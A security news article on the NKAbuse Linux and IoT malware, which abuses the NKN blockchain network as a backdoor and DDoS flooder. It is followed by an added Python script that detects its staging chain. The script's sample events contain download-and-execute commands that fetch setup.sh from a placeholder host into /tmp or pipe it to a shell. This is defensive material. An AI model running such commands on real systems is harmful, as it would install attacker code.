Complex NKAbuse Malware Uses Blockchain to Hide on Linux, IoT Machines

Published: 23/11/2024   Category: security




The multifaceted malware leverages the NKN blockchain-based peer-to-peer networking protocol, operating as both a sophisticated backdoor and a flooder launching DDoS attacks.



A sophisticated and versatile malware called NKAbuse has been discovered operating as both a flooder and a backdoor, targeting Linux desktops in Colombia, Mexico, and Vietnam.
According to a report this week from Kaspersky, this cross-platform threat, written in Go, exploits the NKN blockchain-oriented peer-to-peer networking protocol. NKAbuse can infect Linux systems, as well as Linux-derived architectures like MIPS and ARM — which places Internet of Things (IoT) devices at risk as well.
The decentralized NKN network hosts more than 60,000 official nodes, and employs various routing algorithms to streamline data transmission by identifying the most efficient node pathway toward a given payload's destination.
Lisandro Ubiedo, security researcher at Kaspersky, explains that what makes this malware unique is the use of the NKN technology to receive and send data from and to its peers, and its use of Go to generate different architectures, which could infect different types of systems.
It functions as a backdoor to grant unauthorized access, with most of its commands centering on persistence, command execution, and information gathering. The malware can, for instance, capture screenshots by identifying display bounds, convert them to PNG, and transmit them to the bot master, according to Kaspersky's malware analysis of NKAbuse.
Simultaneously, it acts as a flooder, launching destructive distributed denial of service (DDoS) attacks that can disrupt targeted servers and networks, carrying the risk of significantly impacting organizational operations.
"It is a powerful Linux implant with flooder and backdoor capabilities that can attack a target simultaneously using multiple protocols like HTTP, DNS, or TCP, for example, and can also allow an attacker to control the system and extract information from it," Ubiedo says. "All in the same implant."
The implant also includes a Heartbeat structure for regular communication with the bot master, storing data on the infected host like PID, IP address, memory, and configuration.
He adds that before this malware went live in the wild, there was a proof-of-concept (PoC) called NGLite that explored the possibility of using NKN as a remote administration tool, but it wasn't as extensively developed nor as fully armed as NKAbuse.
Peer-to-peer networks have previously been used to distribute malware, including a cloud worm discovered by Palo Alto Networks Unit 42 in July 2023, thought to be the first stage of a wider cryptomining operation.
And in October, the ClearFake campaign was discovered utilizing proprietary blockchain tech to conceal harmful code, distributing malware like RedLine, Amadey, and Lumma through deceptive browser update campaigns.
That campaign, which uses a technique called EtherHiding, showcased how attackers are exploiting blockchain beyond cryptocurrency theft, highlighting its use in concealing diverse malicious activities.
"[The] use of blockchain technology ensures both reliability and anonymity, which indicates the potential for this botnet to expand steadily over time, seemingly devoid of an identifiable central controller," the Kaspersky report noted.
Notably, the malware has no self-propagation mechanism — instead, it relies on someone exploiting a vulnerability to deploy the initial infection. In the attacks that Kaspersky observed, for instance, the attack chain began with the exploitation of an old vulnerability in Apache Struts 2 (CVE-2017-5638, which is incidentally the same bug used to kick off the massive Equifax data breach of 2017).
Thus, to prevent targeted attacks by known or unknown threat actors using NKAbuse, Kaspersky advises that organizations keep operating systems, applications, and antivirus software updated to address known vulnerabilities.
After a successful exploit, the malware then infiltrates victim devices by running a remote shell script (setup.sh) hosted by attackers, which downloads and executes a second-stage malware implant tailored to the target OS architecture, stored in the /tmp directory for execution.
As a result, the security firm also recommends deployment of endpoint detection and response (EDR) solutions for post-compromise cyber-activity detection, investigation, and prompt incident remediation.
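The infection chain described above (a remote setup.sh fetched and run, then a second-stage binary dropped into /tmp and executed) is exactly the kind of post-compromise activity an EDR would be expected to surface. As an added example, not code from the Kaspersky report or from this article, the Python below runs a handful of detection rules over constructed, EDR-style process-execution events and links the stages through the parent-process chain. The event field names, the hostname staging.example, the file names and the PIDs are all assumptions made for the demonstration.

```python
"""Detection rules for the NKAbuse-style staging chain: downloader writes to
/tmp, a shell runs the staged script, a dropped binary executes from /tmp.
Constructed example; the event schema is an assumption, not a vendor format."""
import re
import shlex

# World-writable directories commonly used to stage second-stage payloads.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SHELLS = {"sh", "bash", "dash", "ash"}
DOWNLOADERS = {"curl", "wget"}
URL_RE = re.compile(r"https?://\S+")

# Constructed sample telemetry. PID 1201 stands in for a web application
# process (the page describes exploitation of Apache Struts 2 as the entry
# point); everything below it mirrors the staging chain in the article.
SAMPLE_EVENTS = [
    {"pid": 1201, "ppid": 1, "user": "tomcat", "exe": "/usr/bin/java",
     "cmdline": "java -jar /opt/tomcat/bin/bootstrap.jar start"},
    {"pid": 4011, "ppid": 1201, "user": "tomcat", "exe": "/usr/bin/curl",
     "cmdline": "curl -fsSL http://staging.example/setup.sh -o /tmp/setup.sh"},
    {"pid": 4012, "ppid": 1201, "user": "tomcat", "exe": "/bin/sh",
     "cmdline": "sh /tmp/setup.sh"},
    {"pid": 4013, "ppid": 4012, "user": "tomcat", "exe": "/tmp/app_linux_amd64",
     "cmdline": "/tmp/app_linux_amd64"},
    # Same idea without touching disk first: the script is piped into a shell.
    {"pid": 4020, "ppid": 1201, "user": "tomcat", "exe": "/bin/sh",
     "cmdline": "sh -c \"curl -fsSL http://staging.example/setup.sh | sh\""},
    {"pid": 2200, "ppid": 1, "user": "root", "exe": "/usr/sbin/sshd",
     "cmdline": "/usr/sbin/sshd -D"},
]


def _in_staging(path):
    return path.startswith(STAGING_DIRS)


def _basename(path):
    return path.rsplit("/", 1)[-1]


def _staged_args(cmdline):
    """Return the command-line arguments that point into a staging directory."""
    try:
        args = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        args = cmdline.split()
    return [a for a in args if _in_staging(a)]


def classify(event):
    """Return the names of the staging-pattern rules a single event matches."""
    hits = []
    exe, cmdline = event["exe"], event["cmdline"]
    name = _basename(exe)
    staged = _staged_args(cmdline)
    # Rule 1: a binary executing directly out of a staging directory.
    if _in_staging(exe):
        hits.append("exec_from_staging_dir")
    # Rule 2: a shell interpreter running a script that lives in a staging dir.
    if name in SHELLS and staged:
        hits.append("shell_runs_staged_script")
    # Rule 3: a shell whose command line fetches a URL and pipes it onward.
    if name in SHELLS and URL_RE.search(cmdline) and "|" in cmdline:
        hits.append("shell_runs_remote_script")
    # Rule 4: curl/wget fetching a URL and writing the result into a staging dir.
    if name in DOWNLOADERS and URL_RE.search(cmdline) and staged:
        hits.append("download_to_staging_dir")
    return hits


def detect(events):
    """Evaluate every event; raise severity when a flagged ancestor links stages."""
    by_pid = {e["pid"]: e for e in events}
    flagged = {e["pid"]: classify(e) for e in events}
    findings = []
    for e in events:
        rules = flagged[e["pid"]]
        if not rules:
            continue
        # Walk up the parent chain while the ancestors are themselves flagged:
        # a staged binary spawned by a staged script is the full chain.
        chain, ppid = [], e["ppid"]
        while ppid in by_pid and flagged[ppid]:
            chain.append(ppid)
            ppid = by_pid[ppid]["ppid"]
        findings.append({
            "pid": e["pid"], "user": e["user"], "exe": e["exe"],
            "rules": rules, "parent_chain": chain,
            "severity": "high" if chain else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid={f['pid']} user={f['user']} "
              f"exe={f['exe']} rules={f['rules']} chain={f['parent_chain']}")
```

On the constructed events the downloader, the staged script and the piped-shell variant are each flagged on their own, and the dropped binary (PID 4013) is escalated to high severity because its parent is the flagged setup script. The java and sshd processes produce nothing, which is the point of tying the rules to the staging directory rather than to curl or sh in general.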
